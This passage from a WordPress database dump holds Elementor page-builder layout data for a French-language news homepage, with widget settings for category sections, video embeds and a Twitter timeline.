":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2828,852,'_elementor_version','0.4'),(2829,852,'_elementor_css','a:3:{s:4:\"time\";i:1509549676;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2830,853,'_elementor_edit_mode','builder'),(2831,853,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobi